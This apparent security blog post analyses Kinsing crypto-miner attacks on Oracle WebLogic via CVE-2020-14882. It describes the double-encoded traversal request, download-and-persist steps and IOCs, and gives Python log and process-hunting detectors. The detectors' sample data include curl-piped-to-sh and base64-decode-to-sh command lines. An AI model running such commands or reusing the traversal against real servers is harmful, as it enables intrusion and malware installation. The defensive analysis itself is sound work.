Security researchers recently found malicious actors exploiting both old and recently disclosed Oracle WebLogic Server vulnerabilities to deliver crypto-miner malware to infected hosts. Oracle WebLogic Server is mostly used for developing and deploying high-traffic enterprise applications in cloud environments.

The old vulnerability being widely exploited by malicious actors is CVE-2020-14882, a remote code execution (RCE) vulnerability that takes advantage of improper input validation in Oracle WebLogic Server.

This blog discusses the Kinsing malware exploiting this Oracle WebLogic Server vulnerability. Researchers also observed the download of Python and shell scripts that went through a list of actions such as disabling OS security features, watchdog timers and iptables, and finally disabling cloud service provider agents.

Technical analysis of the widely exploited vulnerability

Malicious actors are abusing the old vulnerability CVE-2020-14882, which has been found actively weaponized to gain access to victim organizations. Below is a step-by-step analysis of how the vulnerability is being exploited.

Step 1: The attacker runs scripts abusing the CVE-2020-14882 and CVE-2020-14883 vulnerabilities on unpatched Oracle WebLogic servers.

Step 2: When the scripts are executed on the infected system, the java process spawns three child processes that initiate three different actions: wget/curl, installing the Kinsing malware, and C&C communication.

Step 3: wget/curl executes and installs the Kinsing malware on the infected system, which then disables the firewall or changes the firewall policy.

Step 4: The installed Kinsing malware connects to C&C servers and maintains persistence by adding a cron job on the infected system.

Like other malware of its kind, cryptocurrency-mining malware starts by removing or killing other miner processes running on the infected system, and it also removes Docker images belonging to other crypto-mining malware. The malware then disables security features on the infected host so that critical file attributes can be modified and manipulated. After these steps the script executes and the Kinsing malware is downloaded. Finally, it downloads the malware binaries and creates a cron job to download the wb.sh script.

Detection of WebLogic vulnerability exploitation

In the IPS (Intrusion Prevention System) module, the exploitation can be detected and blocked by the IPS rule "Oracle WebLogic Server Remote Code Execution Vulnerabilities (CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883)". The attacker sent a crafted request that attempted to access the console.portal resource under the "images" folder. "%252e%252e" is a double URL-encoded form of the ".." directory traversal pattern; with it the attacker forced the server to read the contents of the wb.xml file, which downloaded the shell scripts that install the malware.
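For environments without that IPS rule, the same request pattern can be hunted in web server access logs. The following is an added example, not code from the original post or from any vendor product; the log lines are constructed, and the detection works on the fully decoded path so that single- and double-encoded traversals into console.portal are caught alike.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The two
# flagged requests follow the pattern the post describes: console.portal
# reached through a static console folder via the double-encoded "%252e%252e".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2023:10:00:07 +0000] "GET /console/images/%252e%252e/console.portal?_nfpb=true HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2023:10:00:08 +0000] "POST /console/css/%252E%252E/console.portal HTTP/1.1" 200 88
10.0.0.7 - - [01/Jan/2023:10:00:09 +0000] "GET /console/images/logo.png HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"/\.\.(?:/|$)")

def decode_fully(path, max_rounds=3):
    """Undo nested URL encoding: '%252e%252e' -> '%2e%2e' -> '..'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_console_traversal(raw_path):
    """Flag a request that reaches console.portal through '..' under /console/.
    A literal, unencoded '..' in the same place is flagged too."""
    decoded = decode_fully(raw_path.split("?", 1)[0]).lower()
    return (decoded.startswith("/console/")
            and TRAVERSAL_RE.search(decoded) is not None
            and decoded.endswith("console.portal"))

def scan_log(text):
    """Return (ip, method, raw_path) for every request matching the pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_console_traversal(m.group("path")):
            hits.append((m.group("ip"), m.group("method"), m.group("path")))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("possible CVE-2020-14882 exploitation attempt:", *hit)
```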

The anti-malware module provides behavior monitoring against exploitation of these vulnerabilities. It detects the event of a shell script running under java. The malware is detected as Trojan.Linux.KINSING.USELVCR22, with the infected file /tmp/kinsing.

The web reputation module detects and blocks the wb.sh script's attempts to download the Kinsing malware; the URL detected was hxxp://185[.]14[.]30[.]35/kinsing.

A few threat hunting queries

Hunt for potential malicious activity within the environment using the queries below:

  1. Hunt for potential misuse of the Java application by checking for processFilePath:/bin/java AND objectFilePath:/usr/bin/bash.
  2. Hunt for the use of curl or wget initiated by Java via bash: processFilePath:/bin/java AND objectFilePath:/usr/bin/bash AND (objectCmd:curl or objectCmd:wget).
  3. Hunt for the execution of a Base64-decoded string by Java via bash: processFilePath:/bin/java AND objectFilePath:/usr/bin/bash AND objectCmd:base64.
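The three queries express one idea: the WebLogic java process should not be spawning bash that runs downloaders or decodes Base64. As an added example (not from the original post or any product), the same hunts applied to constructed process-telemetry events whose field names mirror the queries; the download URL and Base64 payload in the sample data are harmless placeholders.

```python
import re

# Constructed process-telemetry events (not from the original post). Field names
# mirror the post's queries: processFilePath is the parent process (the WebLogic
# java process), objectFilePath the child it spawned, objectCmd the child command.
# The URL and the base64 string are harmless placeholders.
SAMPLE_EVENTS = [
    {"processFilePath": "/bin/java", "objectFilePath": "/usr/bin/bash",
     "objectCmd": "bash -c 'curl -fsSL http://placeholder.invalid/wb.sh | sh'"},
    {"processFilePath": "/bin/java", "objectFilePath": "/usr/bin/bash",
     "objectCmd": "bash -c 'echo ZWNobyBoaQ== | base64 -d | sh'"},
    {"processFilePath": "/bin/java", "objectFilePath": "/usr/bin/bash",
     "objectCmd": "bash -c 'ls /tmp'"},
    {"processFilePath": "/bin/bash", "objectFilePath": "/usr/bin/bash",
     "objectCmd": "bash -c 'wget -q http://placeholder.invalid/pkg.tgz'"},
    {"processFilePath": "/bin/java", "objectFilePath": "/usr/bin/java",
     "objectCmd": "java -version"},
]

def _java_spawned_bash(event):
    # Adapt these paths to where java really lives in your environment
    # (often a JDK directory); the post's queries use /bin/java literally.
    return (event["processFilePath"] == "/bin/java"
            and event["objectFilePath"] == "/usr/bin/bash")

def _cmd_has(event, *tools):
    # Whole-word match: finds 'wget' inside "bash -c '...'" but not in 'wgetter'.
    return any(re.search(rf"\b{re.escape(t)}\b", event["objectCmd"]) for t in tools)

# The three hunts from the post, as predicates over a single event.
HUNTS = {
    "java_spawns_bash": _java_spawned_bash,
    "java_bash_downloader": lambda e: _java_spawned_bash(e) and _cmd_has(e, "curl", "wget"),
    "java_bash_base64": lambda e: _java_spawned_bash(e) and _cmd_has(e, "base64"),
}

def run_hunts(events):
    """Return {hunt name: [indices of matching events]} for triage."""
    return {name: [i for i, e in enumerate(events) if pred(e)]
            for name, pred in HUNTS.items()}

if __name__ == "__main__":
    for name, hits in run_hunts(SAMPLE_EVENTS).items():
        print(f"{name}: {len(hits)} hit(s) at event index {hits}")
```

The fourth event (an administrator's bash running wget) is deliberately not matched: the parent-process condition is what separates the hunt from ordinary package downloads.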

Indicators of Compromise (IOCs)

URLs:

File Hashes

020c14b7bf5ff410ea12226f9ca070540bd46eff80cf20416871143464f7d546 – Trojan.SH.CVE20207961.SM

5D2530B809FD069F97B30A5938D471DD2145341B5793A70656AAD6045445CF6D – Trojan.Linux.KINSING.USELVCR22

IP addresses

212[.]22[.]77[.]79

185[.]234[.]247[.]8

185[.]154[.]53[.]140

By Michael

The writer of Infohaunt is a cyber security professional with experience in SOC operations, threat management, incident response, threat hunting and digital forensics.